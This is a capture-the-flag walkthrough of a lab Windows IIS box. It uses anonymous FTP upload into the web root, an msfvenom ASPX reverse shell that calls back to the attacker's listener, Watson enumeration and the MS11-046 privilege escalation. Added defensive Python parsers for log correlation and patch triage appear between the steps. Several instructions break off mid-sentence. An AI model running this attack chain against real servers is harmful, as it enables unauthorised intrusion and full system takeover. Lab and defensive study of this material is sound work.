| 10.10.10.5 | Windows | Easy | 15 March 2017 |
As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.
```
kali@kali:~$ nmap -sC -sV 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 11:19 EDT
Nmap scan report for 10.10.10.5
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.87 seconds
```
While nmap is running, we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command
The nmap scan reveals an open FTP service with anonymous login enabled, and the ftp-anon script prints the directory listing visible to the anonymous user. The files in that listing (aspnet_client, iisstart.htm, welcome.png) are the default start page files of a Microsoft IIS web server, which suggests the FTP root is the IIS document root.
Opening the host in the browser confirms what the FTP server shows. The page opens to an IIS start page.
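The two findings worth pulling out of that scan are the anonymous FTP login and the fact that the listing contains the default IIS site files, which is what links the FTP service to the web server. The parser below is an added example (not part of the original writeup, and not an nmap feature): it groups the NSE script lines under their port and flags those two conditions plus the risky HTTP methods line. The nmap output it parses is a constructed sample trimmed from the scan above.

```python
import re

# Constructed sample, trimmed from the nmap -sC -sV run shown above.
SAMPLE_NMAP = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
LISTING_RE = re.compile(r"^\d\d-\d\d-\d\d\s")
# Files the default IIS 7.x site ships in its document root; seeing them in an
# anonymous FTP listing suggests the FTP root and the web root are the same directory.
IIS_ROOT_MARKERS = {"iisstart.htm", "welcome.png", "aspnet_client"}

def parse_ports(text):
    """Group the NSE script lines (those starting with '|') under their port entry."""
    ports, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5).strip(), "script": []}
            ports.append(current)
        elif current is not None and line.startswith("|"):
            # strip the '|', '|_' and indentation nmap uses for script output
            current["script"].append(line.lstrip("|_ ").rstrip())
    return ports

def triage(text):
    """Return (port, finding) pairs for the misconfigurations this walkthrough relies on."""
    findings = []
    for p in parse_ports(text):
        script = "\n".join(p["script"])
        if "Anonymous FTP login allowed" in script:
            findings.append((p["port"], "anonymous FTP login enabled"))
            # directory listing lines start with a MM-DD-YY date; last token is the name
            listed = {l.split()[-1] for l in p["script"] if LISTING_RE.match(l)}
            if listed & IIS_ROOT_MARKERS:
                findings.append((p["port"], "anonymous FTP root looks like the IIS web root"))
        if "Potentially risky methods:" in script:
            methods = script.split("Potentially risky methods:", 1)[1].splitlines()[0].strip()
            findings.append((p["port"], f"risky HTTP methods enabled: {methods}"))
    return findings

if __name__ == "__main__":
    for port, finding in triage(SAMPLE_NMAP):
        print(f"{port}/tcp: {finding}")
```

Feed it a real `nmap -sC -sV` text file instead of `SAMPLE_NMAP` and the same three checks apply; the "FTP root looks like the IIS web root" finding is the one that turns an anonymous-read issue into an anonymous-write-to-webroot issue once upload is confirmed.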
Connecting to FTP
Using the built-in Linux ftp client we can connect to the server.
cd into our working directory and connect by running the command
ftp 10.10.10.5. When asked for a username, log in with the name
anonymous. The server then asks for an e-mail address as the password; this can be left empty.
Testing file upload
Now that we are connected we should test file upload. Open a new terminal session,
cd into our working directory again and create a new file with the command
touch test.txt. This creates an empty file with the name test.txt.
Back on the terminal session connected to the FTP server, upload the file with the command
put test.txt. The server should respond that the file has been uploaded successfully.
Checking the FTP and Web server link
Once the file has been uploaded to the FTP server we can check whether the FTP root is the web server's document root by browsing to
http://10.10.10.5/test.txt. If this loads a blank page instead of an error page, the upload landed in the web root, which means we can upload files that the web server will serve.
Exploiting file upload
Now that we have established we have file upload capabilities we can exploit this to open a reverse shell.
Generating reverse shell payload (MSFVenom)
To establish a connection for our reverse shell we will use an
.aspx payload generated via MSFVenom using the command below, setting
LHOST to our Kali machine's IP and LPORT to the port our listener will use.
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4455 -f aspx > shell.aspx
```
With the shell.aspx file generated we can now upload it the same way as our test file:
- Login with user anonymous
To receive the connection from the reverse shell we need to open a netcat listener. Open a new terminal session and run the command
nc -nvlp 4455, using the same port number as the LPORT in the msfvenom command.
Establish shell connection
With the payload uploaded via FTP and our listener open, we can establish our connection by navigating to
http://10.10.10.5/shell.aspx in a web browser.
After a few moments our netcat listener will show the output below.
```
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>
```
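From the defender's side, the chain just walked through leaves a clear trail: an anonymous FTP session stores a file with a server-side executable extension, and shortly afterwards the web server receives a request for that same path. IIS writes both its FTP and web logs in W3C extended format, where a `#Fields:` header names the columns. The correlator below is an added example (not from the original writeup and not an IIS or Microsoft tool); the two log excerpts are constructed samples modelled on that format, and the exact column set is an assumption, which is why the parser reads the column names from the header rather than hard-coding positions.

```python
import os

# Constructed IIS FTP log (W3C extended format; the column set is an assumption).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2017-03-18 02:06:01 10.10.14.18 anonymous PASS - 230
2017-03-18 02:06:20 10.10.14.18 anonymous STOR /test.txt 226
2017-03-18 02:07:05 10.10.14.18 anonymous STOR /shell.aspx 226
2017-03-18 02:08:00 10.10.14.18 anonymous STOR /WatsonNet3.5AnyCPU.exe 226
2017-03-18 02:08:30 10.10.14.18 anonymous STOR /blocked.aspx 550
"""

# Constructed IIS web log for the same window.
WEB_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2017-03-18 02:06:30 10.10.10.5 GET /test.txt - 80 10.10.14.18 Mozilla/5.0 200
2017-03-18 02:07:15 10.10.10.5 GET /shell.aspx - 80 10.10.14.18 Mozilla/5.0 200
2017-03-18 02:09:00 10.10.10.5 GET /iisstart.htm - 80 10.10.14.3 Mozilla/5.0 200
"""

# Extensions IIS will execute (or that matter as dropped tooling) rather than serve as static content.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll", ".bat"}

def parse_w3c(text):
    """Parse W3C extended log lines into dicts keyed by the names in the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other directives (#Software, #Date) and blank lines
        elif fields:
            values = line.split()
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records

def uploaded_executables(ftp_records):
    """Completed STOR commands (2xx reply) for files with an executable extension."""
    hits = []
    for r in ftp_records:
        if r["cs-method"] == "STOR" and r["sc-status"].startswith("2"):
            if os.path.splitext(r["cs-uri-stem"])[1].lower() in EXECUTABLE_EXT:
                hits.append(r)
    return hits

def correlate(ftp_text, web_text):
    """One alert per executable upload, noting whether the web server has since served it."""
    ftp, web = parse_w3c(ftp_text), parse_w3c(web_text)
    alerts = []
    for up in uploaded_executables(ftp):
        uploaded_at = f"{up['date']} {up['time']}"
        # ISO-style, zero-padded timestamps compare correctly as strings
        later_requests = [w for w in web
                          if w["cs-uri-stem"].lower() == up["cs-uri-stem"].lower()
                          and f"{w['date']} {w['time']}" >= uploaded_at]
        alerts.append({
            "file": up["cs-uri-stem"],
            "uploaded_by": up["cs-username"],
            "uploader_ip": up["c-ip"],
            "uploaded_at": uploaded_at,
            "requested": bool(later_requests),
            "first_request": later_requests[0] if later_requests else None,
        })
    return alerts

if __name__ == "__main__":
    for a in correlate(FTP_LOG, WEB_LOG):
        state = "EXECUTED via HTTP" if a["requested"] else "uploaded, not yet requested"
        print(f"{a['uploaded_at']} {a['uploader_ip']} ({a['uploaded_by']}) {a['file']}: {state}")
```

The test.txt upload produces no alert because a text file is not executable, and the 550 (refused) STOR is ignored; the `.exe` upload is still reported even though nothing requested it, since tooling dropped into the web root is worth a ticket on its own. The durable fix is the one the correlation points at: the FTP site should not write into the IIS document root, and anonymous write should be off.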
We now have shell access to the box as the
With shell access to the box we can now enumerate the system to find our path to Administrator access.
To find out whether there are any available kernel exploits for this build of Windows we will upload and run
WatsonNet3.5AnyCPU.exe from the GitHub repo
- Copy this file to our working directory
- IMPORTANT - in our FTP session set the transfer mode to binary by running the command binary
- Upload the file with put WatsonNet3.5AnyCPU.exe
- In our reverse shell session change directory to the IIS document root with
- Run Watson with
After a few moments we should see the output below. Watson has found several missing patches for this build of Windows and suggests available exploits for each.
```
WatsonNet3.5AnyCPU.exe
  __    __      _
 / / /\ \ \__ _| |_ ___  ___  _ __
 \ \/  \/ / _` | __/ __|/ _ \| '_ \
  \  /\  / (_| | |_\__ \ (_) | | | |
   \/  \/ \__,_|\__|___/\___/|_| |_|
                              v0.1

  Sherlock sucks...
  @_RastaMouse

 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

 [*] Appears vulnerable to MS10-073
  [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
  [>] Exploit: https://www.exploit-db.com/exploits/36327/
  [>] Notes: None.

 [*] Appears vulnerable to MS10-092
  [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.Also, In a default configuration, normal users can read and write the task files that they have created.By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
  [>] Notes: None.

 [*] Appears vulnerable to MS11-046
  [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
  [>] Exploit: https://www.exploit-db.com/exploits/40564/
  [>] Notes: None.

 [*] Appears vulnerable to MS12-042
  [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
  [>] Exploit: https://www.exploit-db.com/exploits/20861/
  [>] Notes: None.

 [*] Appears vulnerable to MS13-005
  [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
  [>] Notes: None.

 [*] Finished. Found 5 vulns :)
```
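Watson's output is a list of missing Microsoft security bulletins for the reported build, each with a description and an exploit reference, which is exactly the shape of a patch backlog. The parser below is an added example (not part of the writeup and not a Watson feature) that turns the text into structured records, extracts the build number, and cross-checks the "Found N vulns" trailer against what was actually parsed so a truncated capture is caught. The input is a constructed sample assembled from the Watson run above.

```python
import re

# Constructed sample assembled from the Watson run shown above (banner omitted).
SAMPLE_WATSON = r"""
 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

 [*] Appears vulnerable to MS10-073
  [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
  [>] Exploit: https://www.exploit-db.com/exploits/36327/
  [>] Notes: None.

 [*] Appears vulnerable to MS10-092
  [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
  [>] Notes: None.

 [*] Appears vulnerable to MS11-046
  [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
  [>] Exploit: https://www.exploit-db.com/exploits/40564/
  [>] Notes: None.

 [*] Appears vulnerable to MS12-042
  [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
  [>] Exploit: https://www.exploit-db.com/exploits/20861/
  [>] Notes: None.

 [*] Appears vulnerable to MS13-005
  [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
  [>] Notes: None.

 [*] Finished. Found 5 vulns :)
"""

BUILD_RE = re.compile(r"^\s*\[\*\] OS Build number: (\d+)")
VULN_RE = re.compile(r"^\s*\[\*\] Appears vulnerable to (\S+)")
DETAIL_RE = re.compile(r"^\s*\[>\] (Description|Exploit|Notes): (.*)$")
FINISHED_RE = re.compile(r"^\s*\[\*\] Finished\. Found (\d+) vulns")

def parse_watson(text):
    """Return (build_number, findings, claimed_count) from Watson's text output."""
    build, claimed, findings, current = None, None, [], None
    for line in text.splitlines():
        if m := BUILD_RE.match(line):
            build = int(m.group(1))
        elif m := VULN_RE.match(line):
            # each "[*] Appears vulnerable to" line opens a new record
            current = {"id": m.group(1), "Description": "", "Exploit": "", "Notes": ""}
            findings.append(current)
        elif (m := DETAIL_RE.match(line)) and current is not None:
            current[m.group(1)] = m.group(2).strip()
        elif m := FINISHED_RE.match(line):
            claimed = int(m.group(1))
    return build, findings, claimed

def patch_list(text):
    """Defender view: bulletins to apply to this build, flagging those with a public exploit link."""
    build, findings, claimed = parse_watson(text)
    if claimed is not None and claimed != len(findings):
        raise ValueError(f"Watson reports {claimed} findings but {len(findings)} were parsed")
    return [{"build": build, "bulletin": f["id"],
             "public_exploit": f["Exploit"].startswith("http")} for f in findings]

if __name__ == "__main__":
    for entry in patch_list(SAMPLE_WATSON):
        print(f"build {entry['build']}: apply {entry['bulletin']}"
              f"{' (public exploit available)' if entry['public_exploit'] else ''}")
```

Every bulletin on this box's list ships with a public exploit reference, so the prioritisation is simple: all five are missing from a 2009-era build and the host needs patching in full rather than one bulletin at a time.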
- Download the exploit from the SecWiki GitHub repo
ms11-046.exe to the working directory
- Make sure the FTP session is still in binary mode
- Upload with put ms11-046.exe
- Run the exploit in our shell session by running
The exploit will run but will not show any output. To check whether it was successful, we can run the command
whoami, which should reveal that we are now running as
This box is now completed, and the user and
root flags can be found in their respective